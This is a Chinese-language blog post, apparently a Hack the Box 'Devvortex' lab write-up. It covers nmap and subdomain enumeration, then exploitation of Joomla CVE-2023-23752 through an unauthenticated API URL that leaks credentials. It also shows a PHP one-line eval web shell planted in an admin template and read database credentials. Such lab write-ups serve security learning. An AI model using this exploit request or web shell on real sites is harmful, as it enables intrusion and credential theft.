<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css" media="print" onload="this.media='all'">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="启动连接靶场后，使用nmap扫描地址的路径： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475root@kali:~&#x2F;Desktop# nmap -T4 -A -v">
<meta property="og:type" content="article">
<meta property="og:title" content="Hack the Box Devvoryex 靶场记录">
<meta property="og:url" content="http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="p0w1rSh4ll&#39;s blog">
<meta property="og:description" content="启动连接靶场后，使用nmap扫描地址的路径： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475root@kali:~&#x2F;Desktop# nmap -T4 -A -v">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203234830995.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203235753499.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203235836830.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203235916863.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203235938309.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203235959083.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000013172.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000034798.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000054352.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000146219.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000202610.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000214014.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000243948.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000301917.png">
<meta property="og:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240204000332293.png">
<meta property="article:published_time" content="2024-02-03T15:43:21.000Z">
<meta property="article:modified_time" content="2024-02-03T16:03:34.981Z">
<meta property="article:author" content="p0w1rSh4ll">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Security">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://blog.p0w1rsh4ll.cn/imgs/$%7Bfiilename%7D/image-20240203234830995.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Hack the Box Devvoryex 靶场记录</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/takuyasec/">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/02/05/Real-World-CTF-6th-Be-more-Elegant/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&text=Hack the Box Devvoryex 靶场记录"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&is_video=false&description=Hack the Box Devvoryex 靶场记录"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hack the Box Devvoryex 靶场记录&body=Check out this article: http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&name=Hack the Box Devvoryex 靶场记录&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&t=Hack the Box Devvoryex 靶场记录"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Hack the Box Devvoryex 靶场记录
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">p0w1rSh4ll</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-02-03T15:43:21.000Z" class="dt-published" itemprop="datePublished">2024-02-03</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/CTF/" rel="tag">CTF</a>, <a class="p-category" href="/tags/Security/" rel="tag">Security</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>启动连接靶场后，使用nmap扫描地址的路径：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># nmap -T4 -A -v -Pn 10.10.11.242</span></span><br><span class="line">Host discovery disabled (-Pn). All addresses will be marked <span class="string">&#x27;up&#x27;</span> and scan <span class="built_in">times</span> may be slower.</span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 00:12 CST</span><br><span class="line">NSE: Loaded 156 scripts <span class="keyword">for</span> scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 00:12</span><br><span class="line">Completed NSE at 00:12, 0.00s elapsed</span><br><span class="line">Initiating NSE at 00:12</span><br><span class="line">Completed NSE at 00:12, 0.00s elapsed</span><br><span class="line">Initiating NSE at 00:12</span><br><span class="line">Completed NSE at 00:12, 0.00s elapsed</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 00:12</span><br><span class="line">Completed Parallel DNS resolution of 1 host. at 00:12, 0.01s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 00:12</span><br><span class="line">Scanning 10.10.11.242 [1000 ports]</span><br><span class="line">Discovered open port 22/tcp on 10.10.11.242</span><br><span class="line">Discovered open port 80/tcp on 10.10.11.242</span><br><span class="line">Increasing send delay <span class="keyword">for</span> 10.10.11.242 from 0 to 5 due to max_successful_tryno increase to 5</span><br><span class="line">Increasing send delay <span class="keyword">for</span> 10.10.11.242 from 5 to 10 due to max_successful_tryno increase to 6</span><br><span class="line">Completed SYN Stealth Scan at 00:13, 48.63s elapsed (1000 total ports)</span><br><span class="line">Initiating Service scan at 00:13</span><br><span class="line">Scanning 2 services on 10.10.11.242</span><br><span class="line">Completed Service scan at 00:13, 7.42s elapsed (2 services on 1 host)</span><br><span class="line">Initiating OS detection (try <span class="comment">#1) against 10.10.11.242</span></span><br><span class="line">Retrying OS detection (try <span class="comment">#2) against 10.10.11.242</span></span><br><span class="line">Retrying OS detection (try <span class="comment">#3) against 10.10.11.242</span></span><br><span class="line">Initiating Traceroute at 00:14</span><br><span class="line">Completed Traceroute at 00:14, 1.81s elapsed</span><br><span class="line">Initiating Parallel DNS resolution of 2 hosts. at 00:14</span><br><span class="line">Completed Parallel DNS resolution of 2 hosts. at 00:14, 0.01s elapsed</span><br><span class="line">NSE: Script scanning 10.10.11.242.</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 27.06s elapsed</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 4.96s elapsed</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 0.00s elapsed</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.11.242</span><br><span class="line">Host is up (0.50s latency).</span><br><span class="line">Not shown: 998 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)</span><br><span class="line">|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)</span><br><span class="line">|_  256 18:<span class="built_in">cd</span>:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)</span><br><span class="line">80/tcp open  http    nginx 1.18.0 (Ubuntu)</span><br><span class="line">|_http-title: Did not follow redirect to http://devvortex.htb/</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Supported Methods: GET HEAD POST OPTIONS</span><br><span class="line">|_http-server-header: nginx/1.18.0 (Ubuntu)</span><br><span class="line">Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)</span><br><span class="line">No exact OS matches <span class="keyword">for</span> host (<span class="built_in">test</span> conditions non-ideal).</span><br><span class="line">Uptime guess: 0.000 days (since Thu Jan 25 00:14:02 2024)</span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">TCP Sequence Prediction: Difficulty=252 (Good luck!)</span><br><span class="line">IP ID Sequence Generation: All zeros</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using port 111/tcp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line">1   792.32 ms 10.10.14.1</span><br><span class="line">2   792.48 ms 10.10.11.242</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 0.00s elapsed</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 0.00s elapsed</span><br><span class="line">Initiating NSE at 00:14</span><br><span class="line">Completed NSE at 00:14, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/bin/../share/nmap</span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 115.80 seconds</span><br><span class="line">           Raw packets sent: 1442 (66.912KB) | Rcvd: 1303 (58.018KB)</span><br></pre></td></tr></table></figure>



<p>从上面扫描的结果来看，可以发现主机开启了80和22端口，那么就先从80端口下手。</p>
<p>可以尝试访问80端口，但是发现页面无法打开，那么就尝试将IP和域名在host表中进行绑定</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># vim /etc/hosts </span></span><br><span class="line">root@kali:~/Desktop<span class="comment"># cat /etc/hosts            </span></span><br><span class="line">127.0.0.1       localhost</span><br><span class="line">127.0.1.1       kali</span><br><span class="line">10.10.11.242    devvortex.htb</span><br></pre></td></tr></table></figure>

<p>然后在浏览器中继续访问刚才的地址，可以发现现在就可以正常访问到页面了。</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240203234830995.png"></p>
<p>页面浏览之后并没有发现什么有价值的东西，接下来尝试对网站目录进行扫描，使用的是dirsearch：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># dirsearch -u http://devvortex.htb/</span></span><br><span class="line">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html</span><br><span class="line">  from pkg_resources import DistributionNotFound, VersionConflict</span><br><span class="line"></span><br><span class="line">  _|. _ _  _  _  _ _|_    v0.4.3                                          </span><br><span class="line"> (_||| _) (/_(_|| (_| )                                                   </span><br><span class="line">                                                                          </span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25</span><br><span class="line">Wordlist size: 11460</span><br><span class="line"></span><br><span class="line">Output File: /root/Desktop/reports/http_devvortex.htb/__24-01-25_00-22-59.txt</span><br><span class="line"></span><br><span class="line">Target: http://devvortex.htb/</span><br><span class="line"></span><br><span class="line">[00:22:59] Starting:                                                      </span><br><span class="line">[00:23:25] 301 -  178B  - /js  -&gt;  http://devvortex.htb/js/</span><br><span class="line">[00:24:19] 200 -    7KB - /about.html                                     </span><br><span class="line">[00:25:48] 200 -    9KB - /contact.html                                   </span><br><span class="line">[00:25:53] 301 -  178B  - /css  -&gt;  http://devvortex.htb/css/             </span><br><span class="line">[00:26:43] 301 -  178B  - /images  -&gt;  http://devvortex.htb/images/       </span><br><span class="line">[00:26:43] 403 -  564B  - /images/                                        </span><br><span class="line">[00:26:50] 403 -  564B  - /js/</span><br><span class="line"></span><br><span class="line">Task Completed               </span><br></pre></td></tr></table></figure>



<p>接下来尝试扫描子域名，使用 gobuster：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/amass/subdomains-top1mil-20000.txt --threads=40 --timeout=20s --append-domain</span></span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/image-20240203235753499.png"></p>
<p>扫描子域名后发现存在一个子域名，且状态码200，说明可以访问，那么就将这个子域名加入到hosts文件中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># cat /etc/hosts</span></span><br><span class="line">127.0.0.1       localhost</span><br><span class="line">127.0.1.1       kali</span><br><span class="line">10.10.11.242    devvortex.htb</span><br><span class="line">10.10.11.242    dev.devvortex.htb</span><br></pre></td></tr></table></figure>

<p>接下来访问这个子域名网站，并且扫描子域名网站</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~/Desktop<span class="comment"># dirsearch -u http://dev.devvortex.htb</span></span><br></pre></td></tr></table></figure>

<p>扫描后可以发现有个administrator的子目录，尝试访问：</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240203235836830.png"></p>
<p>可以看到，这是一个部署了Joomla服务的站点，网上搜索历史漏洞，可以得知有个未授权访问漏洞，CVE-2023-23752</p>
<p>只要访问链接<code>http://dev.devvortex.htb/api/index.php/v1/config/application?public=true</code>,可以获取到用户的用户名和密码：</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240203235916863.png" alt="image-20240203235916863"></p>
<p>登录成功后如下所示：</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240203235938309.png"></p>
<p>进来之后，通过查找页面选项，可以发现在system处有一个Administrator Templates 的功能按钮，可以直接仙剑文件。</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240203235959083.png"></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000013172.png"></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000034798.png"></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000054352.png"></p>
<p>一句话木马写入:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;aaa&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000146219.png"></p>
<p>写入后，使用蚁剑进行连接</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000202610.png"></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000214014.png"></p>
<p>通过查找目录文件，可以发现在配置文件中存在数据库的用户名和密码，并且是MySQL数据库</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000243948.png"></p>
<p><strong>这里要注意下数据库的类型选择的是MySQLLI。</strong></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000301917.png"></p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240204000332293.png"></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/takuyasec/">Projects</a></li>
        
      </ul>
    </div>

    
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&text=Hack the Box Devvoryex 靶场记录"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&is_video=false&description=Hack the Box Devvoryex 靶场记录"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hack the Box Devvoryex 靶场记录&body=Check out this article: http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&title=Hack the Box Devvoryex 靶场记录"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&name=Hack the Box Devvoryex 靶场记录&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://blog.p0w1rsh4ll.cn/2024/02/03/Hack-the-Box-Devvoryex-%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/&t=Hack the Box Devvoryex 靶场记录"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    p0w1rSh4ll
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
